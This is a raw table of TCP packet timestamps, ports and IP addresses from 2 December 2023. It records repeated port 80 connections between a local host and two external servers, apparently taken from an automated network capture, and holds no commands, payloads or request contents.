                                                                          Dec 2, 2023 18:48:37.802459955 CET8049725172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:37.802542925 CET4972580192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:37.802685022 CET4972580192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:37.932343960 CET8049725172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:43.382633924 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:43.600769997 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.601035118 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:43.601402044 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:43.820961952 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.824506044 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.824522018 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.824583054 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:43.824690104 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.824703932 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.824745893 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:43.825041056 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.825078011 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.825119019 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:43.825598955 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.825613976 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.825656891 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:43.825886965 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.825905085 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:43.825948954 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.045376062 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.045397997 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.045481920 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.046278954 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.046293974 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.046309948 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.046363115 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.046384096 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.046425104 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.046435118 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.046452045 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.046468019 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.046493053 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.046509027 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.046554089 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.047823906 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.047840118 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.047858000 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.047873974 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.047885895 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.047924042 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.047939062 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.047955990 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.047970057 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.047985077 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.048000097 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.048031092 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.048398972 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.048449993 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.048495054 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.264046907 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.264101028 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.264246941 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.264630079 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.264646053 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.264749050 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.265239000 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.265288115 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.265402079 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:44.265929937 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.265947104 CET804972837.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:44.266071081 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:45.116712093 CET4972880192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.132796049 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.354572058 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.354892969 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.355299950 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.575592041 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.584605932 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.584623098 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.584682941 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.585444927 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.585459948 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.585501909 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.585773945 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.585823059 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.585861921 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.586472988 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.586488008 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.586530924 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.587069988 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.587085962 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.587136030 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.804873943 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.804894924 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.804965019 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.805423021 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.805442095 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.805490017 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.806360960 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.806580067 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.806632042 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.806972980 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.806988955 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.807029963 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.807451963 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.807467937 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.807518005 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.808041096 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.808056116 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.808089972 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.808537006 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.808551073 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.808599949 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.809226036 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.809247017 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.809294939 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.810220957 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.810235977 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.810278893 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:46.810513973 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.810528994 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:46.810565948 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:47.025187969 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:47.025207043 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:47.025286913 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:47.025300026 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:47.025367022 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:47.025496960 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:47.025727987 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:47.025741100 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:47.025815010 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:47.025898933 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:47.025988102 CET804972937.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:47.026063919 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:47.866693974 CET4972980192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:48.882785082 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.102222919 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.102375031 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.103190899 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.323198080 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.331998110 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.332020998 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.332082033 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.332695007 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.332712889 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.332782030 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.333327055 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.333342075 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.333409071 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.333837986 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.333853006 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.333909988 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.334444046 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.334462881 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.334518909 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.552076101 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.552097082 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.552189112 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.552439928 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.552454948 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.552498102 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.553086042 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.553102970 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.553142071 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.553576946 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.553591013 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.553642988 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.554229975 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.554244995 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.554280043 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.554888010 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.554902077 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.554936886 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.555393934 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.555406094 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.555538893 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.556181908 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.556195974 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.556272030 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.556699038 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.556713104 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.556765079 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.557029009 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.557189941 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.557229042 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.770263910 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.770292997 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.770343065 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.770495892 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.770541906 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.770584106 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.771045923 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.771105051 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.771145105 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.771397114 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.771410942 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.771459103 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:50.616755962 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:51.632689953 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:51.853128910 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:51.853327036 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:51.853564024 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.073494911 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.073931932 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.073950052 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074037075 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.074274063 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074290037 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074378967 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.074549913 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074608088 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074651957 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.074980021 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074996948 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.075056076 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.075373888 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.075388908 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.075431108 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.305774927 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.305797100 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.305864096 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.306391001 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.306436062 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.306478977 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.306785107 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.306854010 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.306896925 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.307353973 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.307369947 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.307419062 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.308024883 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.308057070 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.308100939 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.308634043 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.308649063 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.308691025 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.309144020 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309159040 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309216022 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.309474945 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309592009 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309629917 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309636116 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.309662104 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309700966 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.309726000 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309740067 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309776068 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.525772095 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.525798082 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.525842905 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.526010990 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526030064 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526072025 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.526401043 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526418924 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526459932 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.526797056 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526861906 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526902914 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.527179956 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527196884 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527239084 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.527472973 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527514935 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527565956 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.527870893 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527890921 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527935028 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.528253078 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528284073 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528322935 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.528798103 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528815031 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528856039 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.528950930 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528965950 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529002905 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.529360056 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529381037 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529438019 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.529726028 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529742956 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529774904 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.530030966 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530061960 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530100107 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.530462980 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530481100 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530519009 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.530857086 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530878067 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530981064 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.531371117 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.531388998 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.531435013 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.531845093 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.531862020 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.531897068 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.532440901 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.532485008 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.532530069 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.533144951 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.533164978 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.533205032 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.533732891 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.533756018 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.533793926 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.746042013 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746062994 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746165037 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.746212006 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746231079 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746296883 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.746634960 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746651888 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746694088 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.746942043 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746977091 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747018099 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.747174978 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747251987 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747288942 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.747577906 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747649908 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747689009 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.747951031 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748012066 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748050928 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.748341084 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748357058 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748394012 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.748703003 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748718023 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748769999 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.749032021 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.749047041 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.749083042 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.749402046 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.749490976 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.749531984 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.749965906 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.749998093 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.750035048 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.750524044 CET804973137.140.192.89192.168.2.5
